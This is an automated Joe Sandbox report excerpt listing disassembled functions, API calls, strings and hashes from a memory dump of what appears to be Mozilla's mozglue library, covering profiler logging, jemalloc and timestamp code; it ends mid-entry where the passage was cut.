Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: ce0a5d8db6a65f0256ca4d7d2fd86c38ed2ff0a06707569b227e2c0335d63600
Instruction ID: 0371e535ab0ca52cae7c7a1223ea6758f500a484be483a70a94e8c6f5f57a38c
Opcode Fuzzy Hash: ce0a5d8db6a65f0256ca4d7d2fd86c38ed2ff0a06707569b227e2c0335d63600
Instruction Fuzzy Hash: EB0128707023818BDB008FEEF9D8A52B7F7E746314F1809259A3192B40D774A406CA2E

Function 6C6BF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F

GetCurrentThreadId.KERNEL32 ref: 6C6BF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C6BF598), ref: 6C6BF621

Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508

GetCurrentThreadId.KERNEL32 ref: 6C6BF637
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8,?,?,00000000,?,6C6BF598), ref: 6C6BF645
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8,?,?,00000000,?,6C6BF598), ref: 6C6BF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C6BF62A

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 26c2ffd6def345d0768e2c566c00fd8fd5118ef790399fe0ed8e208dadd179a3
Instruction ID: 54a7755fdf19fcda9e5e1c8b43d4b31812fffa6e68fee94428139c8a5074ec72
Opcode Fuzzy Hash: 26c2ffd6def345d0768e2c566c00fd8fd5118ef790399fe0ed8e208dadd179a3
Instruction Fuzzy Hash: 90F05479200204ABDB006F6AA88895A77BFFFC729DF000415EE6593752DB754C06C77E

Function 6C6B05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C6ACFAE,?,?,?,6C6731A7), ref: 6C6B05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C6ACFAE,?,?,?,6C6731A7), ref: 6C6B0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6731A7), ref: 6C6B061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6731A7), ref: 6C6B0627

Strings

<jemalloc>, xrefs: 6C6B05FA, 6C6B060F
: (malloc) Error in VirtualFree(), xrefs: 6C6B061B, 6C6B0625

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 6297b76c3663be4c7ea528a0ec1fe5dfb7e62dcb0351d3c95e8d9d77dab87220
Instruction ID: 77f17740782a811ad2d48a0e3e683afc2b5590e89693ebbc5f72f88c815c23f0
Opcode Fuzzy Hash: 6297b76c3663be4c7ea528a0ec1fe5dfb7e62dcb0351d3c95e8d9d77dab87220
Instruction Fuzzy Hash: 1FE086E290601037F514225A7C8ADBB7A1CDBC6134F04003AFE0D43301E94AAD1951FA

Function 6C6805F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875321ad875b0758aacc97abb2aac577ee9a7eacb8681cb0075a18cffc676d6d
Instruction ID: 8d089980d129f17d6d22bd3c460bcdbb039e9a994919aed92a282c6bca511694
Opcode Fuzzy Hash: 875321ad875b0758aacc97abb2aac577ee9a7eacb8681cb0075a18cffc676d6d
Instruction Fuzzy Hash: 8BA14AB0A02645CFDB24CF29C594A99FBF1BF49304F448A6ED45A97B00E731A985CFA4

Function 6C6D14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6D14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D14E2
GetCurrentThreadId.KERNEL32 ref: 6C6D1546
InitializeConditionVariable.KERNEL32(?), ref: 6C6D15BA
free.MOZGLUE(?), ref: 6C6D16B4

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: d87de9ec82f7de81effe7751b196bb776a8d377e9b11ed042cc4bd8f70877c03
Instruction ID: f394cbac3c3d8b47307519e35e12f3c4c6f095c2f65188829e6e68ddf796e467
Opcode Fuzzy Hash: d87de9ec82f7de81effe7751b196bb776a8d377e9b11ed042cc4bd8f70877c03
Instruction Fuzzy Hash: 0661FD72A007409BDB218F21C880BDAB7B1FF8A318F05851DED8A57701DB75E949CB9A

Function 6C6CDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6CDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C6CD38A,?), ref: 6C6CDC6F
free.MOZGLUE(?,?,?,?,?,6C6CD38A,?), ref: 6C6CDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C6CD38A,?), ref: 6C6CDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C6CD38A,?), ref: 6C6CDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C6CD38A,?), ref: 6C6CDD4A

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 084958399cf68daf00241f846c199e68ca59a1c5c8db314d96a79ea24b86dfe1
Instruction ID: 5f8b6ee52171de9c5daf5d629b5abf3e41294ec5bf70a6e0015562b086640966
Opcode Fuzzy Hash: 084958399cf68daf00241f846c199e68ca59a1c5c8db314d96a79ea24b86dfe1
Instruction Fuzzy Hash: BF418DB5B00205CFCB00CF99C88099AB7FAFF89314B554569DA46ABB10DB71FC01CB99

Function 6C6AF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C6AF480

Part of subcall function 6C67F100: LoadLibraryW.KERNEL32(shell32,?,6C6ED020), ref: 6C67F122
Part of subcall function 6C67F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C67F132

CloseHandle.KERNEL32(00000000), ref: 6C6AF555

Part of subcall function 6C6814B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C681248,6C681248,?), ref: 6C6814C9
Part of subcall function 6C6814B0: memcpy.VCRUNTIME140(?,6C681248,00000000,?,6C681248,?), ref: 6C6814EF

Part of subcall function 6C67EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C67EEE3

CreateFileW.KERNEL32 ref: 6C6AF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C6AF523

Strings

\oleacc.dll, xrefs: 6C6AF4CB

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 2401c0f2dcae2fb755b7c7be94d4958dbffec647d44a208d6bcdee7fdebabaae
Instruction ID: 95a9cd6dd354a4cbdc1b96615f5018a7cf5906068dbbe535fc77d0dfb6b60d67
Opcode Fuzzy Hash: 2401c0f2dcae2fb755b7c7be94d4958dbffec647d44a208d6bcdee7fdebabaae
Instruction Fuzzy Hash: 1C41B3706087109FE720DF69D884B9AB7F4AF95318F104E1CF5A083650EB70D94ACB9B

Function 6C6D74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C6D7526
__Init_thread_footer.LIBCMT ref: 6C6D7566
__Init_thread_footer.LIBCMT ref: 6C6D7597

Strings

UnmapViewOfFile2, xrefs: 6C6D7552
kernel32.dll, xrefs: 6C6D7557

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 32a74874c14b7cb24b352903ec55dc3313c147c05b05bd34e210ef51ac4586b9
Instruction ID: 4ed941e13e5acb950da6ad9c3fe26dac6515180091c2a906618d4c137afc43a0
Opcode Fuzzy Hash: 32a74874c14b7cb24b352903ec55dc3313c147c05b05bd34e210ef51ac4586b9
Instruction Fuzzy Hash: 7A21F5317005019BCB158FEAE895E99B3B7EB87325F064529E82587F40CB31B802CE9F

Function 6C6DC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6DC0E9), ref: 6C6DC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6DC437
FreeLibrary.KERNEL32(?,6C6DC0E9), ref: 6C6DC44C

Strings

ntdll.dll, xrefs: 6C6DC413
NtQueryVirtualMemory, xrefs: 6C6DC431

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: d87170b1200daa32979419512649dc051f49d00aa40abe16611bdddead90e97b
Instruction ID: c996828b5942082b6b8e2d1c67a5d7e0f7bb3d2bb249456794d82259501d548b
Opcode Fuzzy Hash: d87170b1200daa32979419512649dc051f49d00aa40abe16611bdddead90e97b
Instruction Fuzzy Hash: B8E09271715309ABDF006F73AA887217BFAAB4B345F044116AA35D2B10EBB4D002CA5E

Function 6C6D75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6D748B,?), ref: 6C6D75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6D75D7
FreeLibrary.KERNEL32(?,6C6D748B,?), ref: 6C6D75EC

Strings

RtlNtStatusToDosError, xrefs: 6C6D75D1
ntdll.dll, xrefs: 6C6D75B3

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: b1db206fe3ea9341d071634ff5b4332cf13913ae62aefdf6702122b162653c3e
Instruction ID: 787e0b5c2cfa929373105b049483a0958f4931fdc697f692c71ae0b028959796
Opcode Fuzzy Hash: b1db206fe3ea9341d071634ff5b4332cf13913ae62aefdf6702122b162653c3e
Instruction Fuzzy Hash: 09E09271650301ABEB006BA3F8CA701FAFAEB47358F104026AA25D1A10EBB59046CF1E

Function 6C6D7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6D7592), ref: 6C6D7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C6D7627
FreeLibrary.KERNEL32(?,6C6D7592), ref: 6C6D763C

Strings

NtUnmapViewOfSection, xrefs: 6C6D7621
ntdll.dll, xrefs: 6C6D7603

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 09754d55780dc40f5c01cfb58cf5a746799f5d73bf006f3979f5aca34b971069
Instruction ID: 29d9ea47a1c1aa51cb009593cc8b6efd19687204919f90d4da5a65bc63253c83
Opcode Fuzzy Hash: 09754d55780dc40f5c01cfb58cf5a746799f5d73bf006f3979f5aca34b971069
Instruction Fuzzy Hash: 44E09A706543419BDF005BA7B889701BAFBE75B399F004115EA25D1B10E7B59006CF1E

Function 6C6DBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C6DBE49), ref: 6C6DBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C6DBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C6DBE49), ref: 6C6DBF38
RtlReAllocateHeap.NTDLL ref: 6C6DBF83
RtlFreeHeap.NTDLL(6C6DBE49,00000000), ref: 6C6DBFA6

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 2d06c2bf03bb1705a431ecee30ba5c4aa816d1cecb5b19df4ff4bb2debb5ac5a
Instruction ID: c27a7b4e56d857f0f1a0ee9ebec6b222546d15b8f893fbeaa8862932f6226ca7
Opcode Fuzzy Hash: 2d06c2bf03bb1705a431ecee30ba5c4aa816d1cecb5b19df4ff4bb2debb5ac5a
Instruction Fuzzy Hash: B8519371A002058FE714CF69CD80B9AB7A6FFC9314F2A4639D516A7B58D730F9068F89

Function 6C6C8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C6BB58D,?,?,?,?,?,?,?,6C6ED734,?,?,?,6C6ED734), ref: 6C6C8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C6BB58D,?,?,?,?,?,?,?,6C6ED734,?,?,?,6C6ED734), ref: 6C6C8EBF
free.MOZGLUE(?,?,?,?,6C6BB58D,?,?,?,?,?,?,?,6C6ED734,?,?,?), ref: 6C6C8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C6BB58D,?,?,?,?,?,?,?,6C6ED734,?,?,?,6C6ED734), ref: 6C6C8F46
free.MOZGLUE(?,?,?,?,6C6BB58D,?,?,?,?,?,?,?,6C6ED734,?,?,?), ref: 6C6C8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6BB58D,?,?,?,?,?,?,?,6C6ED734,?,?,?), ref: 6C6C8F8F

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 7a04c6745d52b11c616603e30a76d70340086e37fe4ac380ce613635310398f3
Instruction ID: 6dd25de96a05089af99053b6bea8e4050c78c68b67302176519363b26c456aa4
Opcode Fuzzy Hash: 7a04c6745d52b11c616603e30a76d70340086e37fe4ac380ce613635310398f3
Instruction Fuzzy Hash: DA5194B1B012168FEB24CF54D8807AE73B2FF49358F15052AD526AB750E732F905CB9A

Function 6C674DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C674E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C674E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C674EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C674F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C674F1E

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: db4f394fc8a03d7614d901dcc203f6446004040c8934e939372a21b9b70dc86d
Instruction ID: e31991be02ecc7b1a0c37c1cd5a997c5229e3c9bd155eeba8304e9c47a12eea8
Opcode Fuzzy Hash: db4f394fc8a03d7614d901dcc203f6446004040c8934e939372a21b9b70dc86d
Instruction Fuzzy Hash: 8141F0716087019FC721CF29C8849ABBBE4BF8A354F108E1DF56687640DBB0E955CFA6

Function 6C681530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C68159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C6815BC
moz_xmalloc.MOZGLUE(-00000001,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C6815E7
free.MOZGLUE(?,?,?,?,?,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C681606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C681637

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 06631a83c1c3e1d099ceb50881c0dedc18b2fd1fb2d79e6f14d6d6865bd6ab99
Instruction ID: d7f3d4f5142a85b999d67a1e89b611d21ce6c77a386dd775177e644c72e730be
Opcode Fuzzy Hash: 06631a83c1c3e1d099ceb50881c0dedc18b2fd1fb2d79e6f14d6d6865bd6ab99
Instruction Fuzzy Hash: E9312CB19011059BC7148E7CD8504AE77A5FB863747240B2DE433DBBD4EB30D94587AA

Function 6C6DAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAD9D

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAE01
GetLastError.KERNEL32(?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAE3D

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: cd440bd74a7659d025e7a607f88f10a6cd912c64e24306336891543727bc806f
Instruction ID: b2c561d380d4368a3de6d1abb3a727a147de282b73418beaab639840acbb5f67
Opcode Fuzzy Hash: cd440bd74a7659d025e7a607f88f10a6cd912c64e24306336891543727bc806f
Instruction Fuzzy Hash: E43186B19052159FD710DF798C44AABBBF8EF49710F15442DE85AD7700E734E805CBA8

Function 6C6D5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

